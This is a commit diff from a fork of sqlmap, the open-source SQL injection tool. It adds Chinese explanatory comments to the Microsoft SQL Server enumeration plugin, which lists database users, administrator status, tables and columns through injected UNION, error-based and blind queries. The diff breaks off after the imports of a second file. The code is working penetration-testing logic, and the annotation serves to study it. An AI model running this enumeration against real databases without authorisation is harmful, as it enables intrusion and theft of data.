Merge pull request '王生晖' (#20) from wangshenghui_new_branch into main

main
ptnqoxywl 2 months ago
commit 55306e9378

@ -5,45 +5,50 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import re # 导入必要的模块
import re # 导入正则表达式模块,用于进行模式匹配
from lib.core.agent import agent
from lib.core.common import arrayizeValue from lib.core.agent import agent # 导入 agent 模块,用于执行 SQL 注入
from lib.core.common import getLimitRange from lib.core.common import arrayizeValue # 导入 arrayizeValue 函数,用于将值转换为列表
from lib.core.common import isInferenceAvailable from lib.core.common import getLimitRange # 导入 getLimitRange 函数,用于生成限制范围
from lib.core.common import isNoneValue from lib.core.common import isInferenceAvailable # 导入 isInferenceAvailable 函数,用于检查是否可以使用推断注入
from lib.core.common import isNumPosStrValue from lib.core.common import isNoneValue # 导入 isNoneValue 函数,用于检查值是否为 None
from lib.core.common import isTechniqueAvailable from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查值是否为正数字字符串
from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查指定的注入技术是否可用
from lib.core.common import safeStringFormat from lib.core.common import safeSQLIdentificatorNaming # 导入 safeSQLIdentificatorNaming 函数,用于安全地命名 SQL 标识符
from lib.core.common import singleTimeLogMessage from lib.core.common import safeStringFormat # 导入 safeStringFormat 函数,用于安全地格式化字符串
from lib.core.common import unArrayizeValue from lib.core.common import singleTimeLogMessage # 导入 singleTimeLogMessage 函数,用于只输出一次的日志消息
from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.common import unArrayizeValue # 导入 unArrayizeValue 函数,用于从列表中提取值
from lib.core.compat import xrange from lib.core.common import unsafeSQLIdentificatorNaming # 导入 unsafeSQLIdentificatorNaming 函数,用于不安全地命名 SQL 标识符
from lib.core.data import conf from lib.core.compat import xrange # 导入 xrange 函数,用于兼容 Python 2 和 3 的循环
from lib.core.data import kb from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import logger from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import queries from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import CHARSET_TYPE from lib.core.data import queries # 导入 queries 对象,用于获取预定义的 SQL 查询语句
from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,定义字符集类型
from lib.core.enums import EXPECTED from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.enums import PAYLOAD from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,定义期望的返回值类型
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,定义注入类型
from lib.core.settings import CURRENT_DB from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类,用于表示没有数据
from lib.request import inject from lib.core.settings import CURRENT_DB # 导入 CURRENT_DB 常量,表示当前数据库
from plugins.generic.enumeration import Enumeration as GenericEnumeration from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from thirdparty import six from plugins.generic.enumeration import Enumeration as GenericEnumeration # 导入 GenericEnumeration 类,作为当前类的父类
from thirdparty import six # 导入 six 模块,用于兼容 Python 2 和 3
# 定义 Enumeration 类,继承自 GenericEnumeration
class Enumeration(GenericEnumeration): class Enumeration(GenericEnumeration):
# 定义 getPrivileges 方法,用于获取数据库用户的权限
def getPrivileges(self, *args, **kwargs): def getPrivileges(self, *args, **kwargs):
# 输出警告信息,说明在 Microsoft SQL Server 上无法获取用户权限,只会检查是否是 DBA
warnMsg = "on Microsoft SQL Server it is not possible to fetch " warnMsg = "on Microsoft SQL Server it is not possible to fetch "
warnMsg += "database users privileges, sqlmap will check whether " warnMsg += "database users privileges, sqlmap will check whether "
warnMsg += "or not the database users are database administrators" warnMsg += "or not the database users are database administrators"
logger.warning(warnMsg) logger.warning(warnMsg)
users = [] users = [] # 初始化用户列表
areAdmins = set() areAdmins = set() # 初始化管理员集合
# 如果配置中指定了用户,则使用该用户,否则获取所有用户
if conf.user: if conf.user:
users = [conf.user] users = [conf.user]
elif not len(kb.data.cachedUsers): elif not len(kb.data.cachedUsers):
@ -51,91 +56,114 @@ class Enumeration(GenericEnumeration):
else: else:
users = kb.data.cachedUsers users = kb.data.cachedUsers
# 遍历用户列表
for user in users: for user in users:
user = unArrayizeValue(user) user = unArrayizeValue(user) # 从列表中提取用户
if user is None: if user is None: # 如果用户为 None则跳过
continue continue
isDba = self.isDba(user) isDba = self.isDba(user) # 检查用户是否为 DBA
if isDba is True: if isDba is True: # 如果是 DBA则添加到管理员集合
areAdmins.add(user) areAdmins.add(user)
kb.data.cachedUsersPrivileges[user] = None kb.data.cachedUsersPrivileges[user] = None # 设置用户的权限信息为 None
# 返回用户的权限信息和管理员集合
return (kb.data.cachedUsersPrivileges, areAdmins) return (kb.data.cachedUsersPrivileges, areAdmins)
# 定义 getTables 方法,用于获取数据库表
def getTables(self): def getTables(self):
# 如果知识库中已缓存表信息,则直接返回
if len(kb.data.cachedTables) > 0: if len(kb.data.cachedTables) > 0:
return kb.data.cachedTables return kb.data.cachedTables
self.forceDbmsEnum() self.forceDbmsEnum() # 强制执行 DBMS 枚举
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB: if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db: if conf.db:
dbs = conf.db.split(',') dbs = conf.db.split(',')
else: else:
dbs = self.getDbs() dbs = self.getDbs()
# 对每个数据库名进行安全命名
for db in dbs: for db in dbs:
dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)
# 移除空字符串的数据库
dbs = [_ for _ in dbs if _] dbs = [_ for _ in dbs if _]
# 输出获取表信息的提示信息
infoMsg = "fetching tables for database" infoMsg = "fetching tables for database"
infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs))) infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs)))
logger.info(infoMsg) logger.info(infoMsg)
# 获取 SQL Server 的表查询语句
rootQuery = queries[DBMS.MSSQL].tables rootQuery = queries[DBMS.MSSQL].tables
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 遍历数据库列表
for db in dbs: for db in dbs:
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList: if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None: if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 尝试使用不同的查询语句获取表信息
for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3): for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3):
query = query.replace("%s", db) query = query.replace("%s", db)
value = inject.getValue(query, blind=False, time=False) value = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
if not isNoneValue(value): if not isNoneValue(value): # 如果结果不为 None则跳出循环
break break
# 如果获取到了表信息,则进行处理
if not isNoneValue(value): if not isNoneValue(value):
value = [_ for _ in arrayizeValue(value) if _] value = [_ for _ in arrayizeValue(value) if _] # 将结果转换为列表
value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] # 安全命名表名
kb.data.cachedTables[db] = value kb.data.cachedTables[db] = value # 将表信息缓存到知识库
# 如果没有获取到表信息,并且可以使用推断注入,则使用推断注入获取表信息
if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:
# 遍历数据库列表
for db in dbs: for db in dbs:
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList: if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None: if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 输出获取表数量的提示信息
infoMsg = "fetching number of tables for " infoMsg = "fetching number of tables for "
infoMsg += "database '%s'" % db infoMsg += "database '%s'" % db
logger.info(infoMsg) logger.info(infoMsg)
# 尝试使用不同的查询语句获取表数量
for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3): for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
_ = query.replace("%s", db) _ = query.replace("%s", db)
count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
if not isNoneValue(count): if not isNoneValue(count): # 如果结果不为 None则跳出循环
break break
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if count != 0: if count != 0:
warnMsg = "unable to retrieve the number of " warnMsg = "unable to retrieve the number of "
@ -143,17 +171,18 @@ class Enumeration(GenericEnumeration):
logger.warning(warnMsg) logger.warning(warnMsg)
continue continue
tables = [] tables = [] # 初始化表列表
# 遍历表索引,获取每个表名
for index in xrange(int(count)): for index in xrange(int(count)):
_ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index) _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index)
table = inject.getValue(_, union=False, error=False) # 执行推断注入并获取结果
table = inject.getValue(_, union=False, error=False) if not isNoneValue(table): # 如果结果不为 None则添加到表列表
if not isNoneValue(table):
kb.hintValue = table kb.hintValue = table
table = safeSQLIdentificatorNaming(table, True) table = safeSQLIdentificatorNaming(table, True) # 安全命名表名
tables.append(table) tables.append(table)
# 如果获取到了表信息,则进行缓存,否则输出警告信息
if tables: if tables:
kb.data.cachedTables[db] = tables kb.data.cachedTables[db] = tables
else: else:
@ -161,25 +190,31 @@ class Enumeration(GenericEnumeration):
warnMsg += "for database '%s'" % db warnMsg += "for database '%s'" % db
logger.warning(warnMsg) logger.warning(warnMsg)
# 如果没有获取到表信息,并且没有指定搜索,则抛出异常
if not kb.data.cachedTables and not conf.search: if not kb.data.cachedTables and not conf.search:
errMsg = "unable to retrieve the tables for any database" errMsg = "unable to retrieve the tables for any database"
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
else: else:
# 对缓存的表名进行排序
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
kb.data.cachedTables[db] = sorted(tables) if tables else tables kb.data.cachedTables[db] = sorted(tables) if tables else tables
# 返回缓存的表信息
return kb.data.cachedTables return kb.data.cachedTables
# 定义 searchTable 方法,用于搜索指定的表
def searchTable(self): def searchTable(self):
foundTbls = {} foundTbls = {} # 初始化找到的表字典
tblList = conf.tbl.split(',') tblList = conf.tbl.split(',') # 获取要搜索的表列表
rootQuery = queries[DBMS.MSSQL].search_table rootQuery = queries[DBMS.MSSQL].search_table # 获取 SQL Server 的表搜索查询语句
tblCond = rootQuery.inband.condition tblCond = rootQuery.inband.condition # 获取表搜索条件
tblConsider, tblCondParam = self.likeOrExact("table") tblConsider, tblCondParam = self.likeOrExact("table") # 获取表搜索的方式 (LIKE 或 EXACT)
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB: if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db: if conf.db:
enumDbs = conf.db.split(',') enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs): elif not len(kb.data.cachedDbs):
@ -187,40 +222,48 @@ class Enumeration(GenericEnumeration):
else: else:
enumDbs = kb.data.cachedDbs enumDbs = kb.data.cachedDbs
# 初始化每个数据库的表搜索结果
for db in enumDbs: for db in enumDbs:
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db)
foundTbls[db] = [] foundTbls[db] = []
# 遍历要搜索的表列表
for tbl in tblList: for tbl in tblList:
tbl = safeSQLIdentificatorNaming(tbl, True) tbl = safeSQLIdentificatorNaming(tbl, True) # 安全命名表名
# 输出搜索表信息的提示信息
infoMsg = "searching table" infoMsg = "searching table"
if tblConsider == "1": if tblConsider == "1":
infoMsg += "s LIKE" infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.info(infoMsg) logger.info(infoMsg)
# 构建表搜索查询条件
tblQuery = "%s%s" % (tblCond, tblCondParam) tblQuery = "%s%s" % (tblCond, tblCondParam)
tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl) tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl)
# 遍历数据库列表
for db in foundTbls.keys(): for db in foundTbls.keys():
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db) # 安全命名数据库名
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList: if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None: if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query.replace("%s", db) query = rootQuery.inband.query.replace("%s", db)
query += tblQuery query += tblQuery
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
# 如果获取到了表信息,则进行处理
if not isNoneValue(values): if not isNoneValue(values):
if isinstance(values, six.string_types): if isinstance(values, six.string_types):
values = [values] values = [values]
@ -230,7 +273,9 @@ class Enumeration(GenericEnumeration):
continue continue
foundTbls[db].append(foundTbl) foundTbls[db].append(foundTbl)
# 如果无法使用上述注入,则使用推断注入搜索表信息
else: else:
# 输出获取表数量的提示信息
infoMsg = "fetching number of table" infoMsg = "fetching number of table"
if tblConsider == "1": if tblConsider == "1":
infoMsg += "s LIKE" infoMsg += "s LIKE"
@ -240,8 +285,8 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count query = rootQuery.blind.count
query = query.replace("%s", db) query = query.replace("%s", db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no table" warnMsg = "no table"
if tblConsider == "1": if tblConsider == "1":
@ -252,50 +297,57 @@ class Enumeration(GenericEnumeration):
continue continue
indexRange = getLimitRange(count) indexRange = getLimitRange(count) # 生成索引范围
# 遍历表索引,获取每个表名
for index in indexRange: for index in indexRange:
query = rootQuery.blind.query query = rootQuery.blind.query
query = query.replace("%s", db) query = query.replace("%s", db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
query = agent.limitQuery(index, query, tblCond) query = agent.limitQuery(index, query, tblCond)
tbl = inject.getValue(query, union=False, error=False) tbl = inject.getValue(query, union=False, error=False) # 执行推断注入并获取结果
kb.hintValue = tbl kb.hintValue = tbl
foundTbls[db].append(tbl) foundTbls[db].append(tbl)
# 清理空的数据库表列表
for db, tbls in list(foundTbls.items()): for db, tbls in list(foundTbls.items()):
if len(tbls) == 0: if len(tbls) == 0:
foundTbls.pop(db) foundTbls.pop(db)
# 如果没有找到任何表,则输出警告信息
if not foundTbls: if not foundTbls:
warnMsg = "no databases contain any of the provided tables" warnMsg = "no databases contain any of the provided tables"
logger.warning(warnMsg) logger.warning(warnMsg)
return return
conf.dumper.dbTables(foundTbls) conf.dumper.dbTables(foundTbls) # 将找到的表信息输出到文件
self.dumpFoundTables(foundTbls) self.dumpFoundTables(foundTbls) # 输出找到的表信息
# 定义 searchColumn 方法,用于搜索指定的列
def searchColumn(self): def searchColumn(self):
rootQuery = queries[DBMS.MSSQL].search_column rootQuery = queries[DBMS.MSSQL].search_column # 获取 SQL Server 的列搜索查询语句
foundCols = {} foundCols = {} # 初始化找到的列字典
dbs = {} dbs = {} # 初始化数据库字典
whereTblsQuery = "" whereTblsQuery = "" # 初始化表 WHERE 条件
infoMsgTbl = "" infoMsgTbl = "" # 初始化表信息
infoMsgDb = "" infoMsgDb = "" # 初始化数据库信息
colList = conf.col.split(',') colList = conf.col.split(',') # 获取要搜索的列列表
# 如果配置中指定了排除的列,则跳过
if conf.exclude: if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
origTbl = conf.tbl origTbl = conf.tbl # 保存原始的表配置
origDb = conf.db origDb = conf.db # 保存原始的数据库配置
colCond = rootQuery.inband.condition colCond = rootQuery.inband.condition # 获取列搜索条件
tblCond = rootQuery.inband.condition2 tblCond = rootQuery.inband.condition2 # 获取表搜索条件
colConsider, colCondParam = self.likeOrExact("column") colConsider, colCondParam = self.likeOrExact("column") # 获取列搜索的方式 (LIKE 或 EXACT)
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB: if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db: if conf.db:
enumDbs = conf.db.split(',') enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs): elif not len(kb.data.cachedDbs):
@ -303,30 +355,36 @@ class Enumeration(GenericEnumeration):
else: else:
enumDbs = kb.data.cachedDbs enumDbs = kb.data.cachedDbs
# 初始化每个数据库的列搜索结果
for db in enumDbs: for db in enumDbs:
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db)
dbs[db] = {} dbs[db] = {}
# 遍历要搜索的列列表
for column in colList: for column in colList:
column = safeSQLIdentificatorNaming(column) column = safeSQLIdentificatorNaming(column) # 安全命名列名
conf.db = origDb conf.db = origDb # 恢复原始的数据库配置
conf.tbl = origTbl conf.tbl = origTbl # 恢复原始的表配置
# 输出搜索列信息的提示信息
infoMsg = "searching column" infoMsg = "searching column"
if colConsider == "1": if colConsider == "1":
infoMsg += "s LIKE" infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
foundCols[column] = {} foundCols[column] = {} # 初始化每个列的搜索结果
# 如果配置中指定了表,则构建表的 WHERE 条件
if conf.tbl: if conf.tbl:
_ = conf.tbl.split(',') _ = conf.tbl.split(',')
whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")"
infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _))
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB: if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则构建数据库信息,否则获取所有数据库
if conf.db: if conf.db:
_ = conf.db.split(',') _ = conf.db.split(',')
infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _))
@ -337,30 +395,35 @@ class Enumeration(GenericEnumeration):
logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb))
# 构建列搜索查询条件
colQuery = "%s%s" % (colCond, colCondParam) colQuery = "%s%s" % (colCond, colCondParam)
colQuery = colQuery % unsafeSQLIdentificatorNaming(column) colQuery = colQuery % unsafeSQLIdentificatorNaming(column)
# 遍历数据库列表
for db in (_ for _ in dbs if _): for db in (_ for _ in dbs if _):
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db) # 安全命名数据库名
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList: if conf.excludeSysDbs and db in self.excludeDbsList:
continue continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None: if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
continue continue
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query % (db, db, db, db, db, db) query = rootQuery.inband.query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
# 如果获取到了列信息,则进行处理
if not isNoneValue(values): if not isNoneValue(values):
if isinstance(values, six.string_types): if isinstance(values, six.string_types):
values = [values] values = [values]
for foundTbl in values: for foundTbl in values:
foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) # 安全命名表名
if foundTbl is None: if foundTbl is None:
continue continue
@ -373,7 +436,7 @@ class Enumeration(GenericEnumeration):
conf.tbl = foundTbl conf.tbl = foundTbl
conf.col = column conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) # 获取列信息
if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl]) dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
@ -386,9 +449,11 @@ class Enumeration(GenericEnumeration):
foundCols[column][db].append(foundTbl) foundCols[column][db].append(foundTbl)
else: else:
foundCols[column][db] = [foundTbl] foundCols[column][db] = [foundTbl]
# 如果无法使用上述注入,则使用推断注入搜索列信息
else: else:
foundCols[column][db] = [] foundCols[column][db] = []
# 输出获取包含该列的表数量的提示信息
infoMsg = "fetching number of tables containing column" infoMsg = "fetching number of tables containing column"
if colConsider == "1": if colConsider == "1":
infoMsg += "s LIKE" infoMsg += "s LIKE"
@ -399,8 +464,9 @@ class Enumeration(GenericEnumeration):
query = query % (db, db, db, db, db, db) query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no tables contain column" warnMsg = "no tables contain column"
if colConsider == "1": if colConsider == "1":
@ -411,18 +477,19 @@ class Enumeration(GenericEnumeration):
continue continue
indexRange = getLimitRange(count) indexRange = getLimitRange(count) # 生成索引范围
# 遍历表索引,获取每个表名
for index in indexRange: for index in indexRange:
query = rootQuery.blind.query query = rootQuery.blind.query
query = query % (db, db, db, db, db, db) query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
query = agent.limitQuery(index, query, colCond.replace("[DB]", db)) query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
tbl = inject.getValue(query, union=False, error=False) tbl = inject.getValue(query, union=False, error=False) # 执行推断注入并获取结果
kb.hintValue = tbl kb.hintValue = tbl
tbl = safeSQLIdentificatorNaming(tbl, True) tbl = safeSQLIdentificatorNaming(tbl, True) # 安全命名表名
if tbl not in dbs[db]: if tbl not in dbs[db]:
dbs[db][tbl] = {} dbs[db][tbl] = {}
@ -432,7 +499,7 @@ class Enumeration(GenericEnumeration):
conf.tbl = tbl conf.tbl = tbl
conf.col = column conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) # 获取列信息
if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]:
dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])
@ -440,7 +507,7 @@ class Enumeration(GenericEnumeration):
else: else:
dbs[db][tbl][column] = None dbs[db][tbl][column] = None
foundCols[column][db].append(tbl) foundCols[column][db].append(tbl) # 将找到的表添加到结果中
conf.dumper.dbColumns(foundCols, colConsider, dbs) conf.dumper.dbColumns(foundCols, colConsider, dbs) # 将找到的列信息输出到文件
self.dumpFoundColumn(dbs, foundCols, colConsider) self.dumpFoundColumn(dbs, foundCols, colConsider) # 输出找到的列信息

@ -5,75 +5,81 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import ntpath # 导入必要的模块
import os import ntpath # 导入 ntpath 模块,用于处理 Windows 路径
import os # 导入 os 模块,用于执行操作系统相关操作
from lib.core.common import checkFile
from lib.core.common import getLimitRange from lib.core.common import checkFile # 导入 checkFile 函数,用于检查文件是否存在
from lib.core.common import isNumPosStrValue from lib.core.common import getLimitRange # 导入 getLimitRange 函数,用于生成限制范围
from lib.core.common import isTechniqueAvailable from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查值是否为正数字字符串
from lib.core.common import posixToNtSlashes from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查指定的注入技术是否可用
from lib.core.common import randomStr from lib.core.common import posixToNtSlashes # 导入 posixToNtSlashes 函数,用于将 POSIX 路径转换为 NT 路径
from lib.core.common import readInput from lib.core.common import randomStr # 导入 randomStr 函数,用于生成随机字符串
from lib.core.compat import xrange from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.convert import encodeBase64 from lib.core.compat import xrange # 导入 xrange 函数,用于兼容 Python 2 和 3 的循环
from lib.core.convert import encodeHex from lib.core.convert import encodeBase64 # 导入 encodeBase64 函数,用于 Base64 编码
from lib.core.convert import rot13 from lib.core.convert import encodeHex # 导入 encodeHex 函数,用于十六进制编码
